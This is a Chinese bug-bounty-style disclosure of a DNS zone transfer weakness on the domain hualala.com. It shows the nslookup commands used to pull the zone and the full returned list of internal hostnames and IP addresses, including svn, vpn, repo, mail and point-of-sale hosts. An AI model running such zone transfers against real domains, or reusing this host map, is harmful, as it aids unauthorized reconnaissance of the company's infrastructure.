漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2013-10-29: 细节已通知厂商并且等待厂商处理中
2013-11-03: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
0.0
详细说明:
哗啦啦
北京格致璞科技旗下知名站点
DNS域传送漏洞:
C:\Users\Administrator>nslookup
默认服务器: google-public-dns-a.google.com
Address: 8.8.8.8
> set type=ns
> hualala.com
服务器: google-public-dns-a.google.com
Address: 8.8.8.8
非权威应答:
hualala.com nameserver = sns.gozap.com
hualala.com nameserver = ns.gozap.com
> server sns.gozap.com
默认服务器: sns.gozap.com
Address: 58.68.151.18
> ls hualala.com
[sns.gozap.com]
hualala.com. A 223.202.20.122
hualala.com. NS server = ns.gozap.com
hualala.com. NS server = sns.gozap.com
* A 223.202.20.122
demo.admin A 223.202.20.122
api A 223.202.20.122
dohko.api A 124.126.42.8
doulaofang A 223.202.20.122
dohko.doulaofang A 124.126.42.8
mu.doulaofang A 124.126.42.8
download A 223.202.17.21
file A 223.202.20.122
img A 223.202.20.122
dohko.img A 124.126.42.8
m A 223.202.20.122
dohko.m A 124.126.42.8
mu.m A 124.126.42.8
mail A 114.113.235.6
mailer A 209.61.151.118
mailer A 209.61.151.193
mobile A 223.202.20.122
dohko.mobile A 124.126.42.8
mu.mobile A 124.126.42.8
pic A 223.202.20.122
demo.pos A 223.202.20.121
pos1 A 223.202.20.118
pos10 A 223.202.20.118
pos2 A 223.202.20.118
pos3 A 223.202.20.118
pos4 A 223.202.20.118
pos5 A 223.202.20.118
pos6 A 223.202.20.118
pos7 A 223.202.20.118
pos8 A 223.202.20.118
pos9 A 223.202.20.118
repo A 124.65.128.90
res A 223.202.20.122
shop A 223.202.20.122
smtp A 58.68.151.22
svn A 124.126.42.8
vpn A 124.126.42.8
wechataccess A 223.202.20.122
mu.wechataccess A 124.126.42.8
www A 223.202.20.122
2012.www A 223.202.20.122
demo.www A 223.202.20.122
dohko.www A 124.126.42.8
mu.www A 124.126.42.8
>
ok
漏洞证明:
如上
修复方案:
改、
版权声明:转载请注明来源 爱上平顶山@乌云
>
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-11-03 19:06
厂商回复:
最新状态:
暂无